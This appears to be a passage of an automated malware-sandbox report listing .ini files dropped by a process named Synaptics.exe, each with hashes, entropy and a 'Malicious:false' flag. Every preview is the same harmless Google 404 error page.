                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265241216155071
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0L8SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Y8+pAZewRDK4mW
                                                                                                                                                                                        MD5:CE2C73266ED1939058C5C48C3C7C6763
                                                                                                                                                                                        SHA1:2FD4621E4FF274E7BF18A98A84D372190288370D
                                                                                                                                                                                        SHA-256:897A6CA470B29764C51B6442061D40267E1AE4DC8F7E3FD706F67C2A28E31F0A
                                                                                                                                                                                        SHA-512:CC0B35961CD0E0B14CB4CBCD1F97FBDD8C1759A7F6A1FD1EC82C34BB11DF2B284E1C8CBC6937A63A4FBB303DECC9603275C596B68DF288DA720FC429F475DAFA
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="s9QOQ/SnE9GOf3gfdQAp+A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ky5gHIj.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.250409573263705
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0UOkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+uk+pAZewRDK4mW
                                                                                                                                                                                        MD5:DE59C53684146CCD3E39600C0ADFA152
                                                                                                                                                                                        SHA1:268051409573F1EED9043BC51FDADFD8121220E6
                                                                                                                                                                                        SHA-256:576CB3B5B1F650F49D39775EA87DC41EF9E406CB62EF33691F99CBF8B3ED535D
                                                                                                                                                                                        SHA-512:2090D191AB65CDAB82C3AE4F3AB226AA4F80A85A47840B8EAFAB783F31F835ABDF8E8367C70D3E1B867553744EBFA591B19FEC5CE62CCF51C34C62CF75A55B4F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e28/I+dpLk1rgNnX1XtCUw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\l66X7YN.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.269043881751296
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0uLzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Pz+pAZewRDK4mW
                                                                                                                                                                                        MD5:55E47616CD2AE9B8C029CC4496062348
                                                                                                                                                                                        SHA1:D9AF5FA4E97E4EBB0411EF25CF4DA291D2341E47
                                                                                                                                                                                        SHA-256:03ADC46801371436AD337496B272BD093D9045F3EA16E43DC849B6824B487982
                                                                                                                                                                                        SHA-512:04540553229DD6537A308FC851D576B99DF20F56319378AEF810843475E382537FA802DDA09AB0E55B912D68124AE94571ED6EBD5D2987A5B0C5CF1CC212216D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IexFTDOfzqDUiqW4X6gp5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\lOfwAyQ.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.259412705701133
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0pYDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+t+pAZewRDK4mW
                                                                                                                                                                                        MD5:2B59A879FD22B234612A0B66517FD2DC
                                                                                                                                                                                        SHA1:FBF310BB1FF43E1D2AD42728658BBFFF109D6D82
                                                                                                                                                                                        SHA-256:852D2598937665F8CDB3E1D3FA0EABE2FE21F9D16FF9998C0FEADDBC56203F73
                                                                                                                                                                                        SHA-512:F78B1355BE09A3B1014967246A456331BFC18980C3EA4261D0ED7A9B4AFA571D33D3D926EB4F3CFF2979414E33F7E8E751F83AB73078DFA1A07AAEECEA8F94CC
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WdDrxAClKAvOIuewrYGmsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\lSmkobg.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.254022105627522
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0sSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+f+pAZewRDK4mW
                                                                                                                                                                                        MD5:06E980205CA30C8E3BD7BF850DF8ECCA
                                                                                                                                                                                        SHA1:E368900305FAE930F983EAEDBD66894BC3E6330E
                                                                                                                                                                                        SHA-256:B888D699E79221B5BC3AC3A2C8E5290F469FA8E5BD536A6D2B6DC9A52B10FBA8
                                                                                                                                                                                        SHA-512:23A22C94D900C3FA1E4C890ED4478AD4E593B28A7E090AE3B2AEF0BC11573DF9A66DEDC7173FACCFA87CFBCBBE7E730E854B86A0A158C311C70F7382896A7344
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jyhTJarqZDKlmnt/30ZpiA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\m3A4sis.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.268053141425095
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ygSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+m+pAZewRDK4mW
                                                                                                                                                                                        MD5:A319C1340AC34640C225D31E0F8B3C6A
                                                                                                                                                                                        SHA1:94814E2E5198F4890B936BC2A8AB9B76B353D1C1
                                                                                                                                                                                        SHA-256:8BA549FBDD809C959E4AF55BCC0EE5662F934A7F13C6DA78C9DB35E88079DDD3
                                                                                                                                                                                        SHA-512:86764BBC6F8DFF312164491BFF71321C478A5A0B1117F37934226FBF4A0B146285521E87E01FE94D6DD5D82EEB5AEBFEC92A8090FE0280C17C6599B3C5C47886
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jW8AtBCkTiLsrEOqDgH9dw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\m3oSNCB.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.275027709162455
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0JDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+m+pAZewRDK4mW
                                                                                                                                                                                        MD5:F451FA059EF7122DC3707D2EA31A00CD
                                                                                                                                                                                        SHA1:E6126AE4EF12CE74D9D6580E727680900DDA560C
                                                                                                                                                                                        SHA-256:F314F4A87AB0A347DE19375D50ABCD7084B07DD21D145B40FCE0556E232626FE
                                                                                                                                                                                        SHA-512:9F2050868E044BDE1A03B5F54F0DB63820CB995CDA596BA8A193A02245BA0E070A93A9915E3AE18C7827252DEBBCE830444692550BE84411C291BEF81AD89C10
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8mlwCP3DWMfUmF5CI+KA9w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\mFiE3RR.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.244978032994843
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0V3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+O3+pAZewRDK4mW
                                                                                                                                                                                        MD5:4B242F578A19008FB3F91711E0525BCB
                                                                                                                                                                                        SHA1:E334B2641276E3F1F983ECD74782F703D62F3B1B
                                                                                                                                                                                        SHA-256:B05A6E1675E9224F43AAC57048F8478A61380A41A1C821D9EBA7E5FAD4AAE22E
                                                                                                                                                                                        SHA-512:BD0F7FDAD85F9ADE24628997A384C02216CFAE41C70D93F986BBD4B87501F9D52BAA38BF407694E32714AC52217950EE4D9D124A48D88A16E7BA9FD4FB19FE91
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="47jolivstl7+Q4uxbl3xXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\mX2LIpj.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.267479244355212
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0LPSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+k+pAZewRDK4mW
                                                                                                                                                                                        MD5:519211D75C72EF185B7303BA20E73D64
                                                                                                                                                                                        SHA1:C3D9CF6944952D7A381197085D4845B01631941F
                                                                                                                                                                                        SHA-256:A640F583D1F0316CE719DFC6869EFC1160D6BEF1229F9C30DF8377C41E4C08BC
                                                                                                                                                                                        SHA-512:E8AAC3C8D7F9F5E38F157585C3904314BC6F0A1C2CDF08622144923F7D13133040CE8D5E53958F30494ED47BEB48E7FFC5E8CB21C8EC5568C447EA685DE4C36B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/rGUGlCVEvTSGsJdIVP0Ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\mYRE1LD.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260609165740069
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0kZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+BZ+pAZewRDK4mW
                                                                                                                                                                                        MD5:49B4DBBA9D6946584272727E4D106C56
                                                                                                                                                                                        SHA1:E46A161C43603DE498A2B67E3D2D46E55FB0DD2C
                                                                                                                                                                                        SHA-256:ABE969494450E402322F8EE77FB7303D4ED6EBF085DAD732731417BABE6E296D
                                                                                                                                                                                        SHA-512:1CEEABA23F956165153602B7AF82257CA8E43D9948D3111C43A973E37119457D8381E26EA58873BFF104C79BDE46EFD4CDE7AE8195B0B9D5557FAC2060A0CD63
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q4Hla/+kqZtl8D3Smab3AA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\mlGjD9h.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.273709230180102
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0p3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+C+pAZewRDK4mW
                                                                                                                                                                                        MD5:D8DED25B8756E5A95BFD766DD19ABABB
                                                                                                                                                                                        SHA1:A969C091CA78CB8F615FE49EE696AF6C7729A37C
                                                                                                                                                                                        SHA-256:E921786B05DC705482FB9A3C58CF413FC75B9B631E5EC5DCCB06C8CD30808485
                                                                                                                                                                                        SHA-512:516D0C941311AB508E5BE658211F7C198D00E0EDEEB3B997845A4ADD24169B332160A8A3A96F0959555D93F3FC6088EBAC0CAC7D00B9C560B64EE859CB2F619E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dDIP8tQ+O+9+PeIPETexRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\n1EyaET.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.262187222072365
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+00lSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Fl+pAZewRDK4mW
                                                                                                                                                                                        MD5:64CF2E2A58E55E8D3F4068DC071E97B4
                                                                                                                                                                                        SHA1:CB298DC459BB660B6A102CC8871E60A9FD908833
                                                                                                                                                                                        SHA-256:7E42120629E1C2A4FBB3D2505FDA66E3D34DF60A98433B598D96E79B7DF0CE9D
                                                                                                                                                                                        SHA-512:30DCC69543D2CE2C5D4D164FDAAEC9CC699B0EC9677C298C9A34B29F2946A63D98EB5ED5356319760D0D6200DD63C20E7A78B3FD2207DD7A0A8C35FCE7A30405
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8mvf5/OplrBA/TKCQJT3Tw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nPuxpSP.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.27046863140436
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+i+pAZewRDK4mW
                                                                                                                                                                                        MD5:647AEF26B7C0756BDE76A28182BA959D
                                                                                                                                                                                        SHA1:1F6F6B5662A63FBBA83987061719B9F5CC36D4F8
                                                                                                                                                                                        SHA-256:B4D3C60063226969AEC97CAEDB39D445747B83BB827B20122AD76591A0645E71
                                                                                                                                                                                        SHA-512:FA4C37C34B9D0A0132C3D3774D8E8D3228150237D2F4A5D48B9774D7AE158DBDB643D04B9489CEF7EA7A90763C8E5BFBE4C0F1971EDFF08B0C0E77C6EB36E2DD
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ud7Zs96LHzKyOXL2NLc9zg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nQBBvRl.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.274013793969082
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0LnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Wn+pAZewRDK4mW
                                                                                                                                                                                        MD5:F0B466EE7CDEB8A1EE8853A5B6B47D83
                                                                                                                                                                                        SHA1:DAE5E404B0CC1D1827FA975E0D75D846E85EDA79
                                                                                                                                                                                        SHA-256:55D27C60A417F3CF820FAE85B945BDEA64420FB27A35A514008F2D1663F90192
                                                                                                                                                                                        SHA-512:BB409CDC6D1EF0CCFF8A7A60200914D1B88CC487A3290CD5ECE561EBDAA5152B8E02B9CBE102D404D2C3A5014D61FAD252593B09C83B91D206020BDAF72CC456
                                                                                                                                                                                        Malicious:false
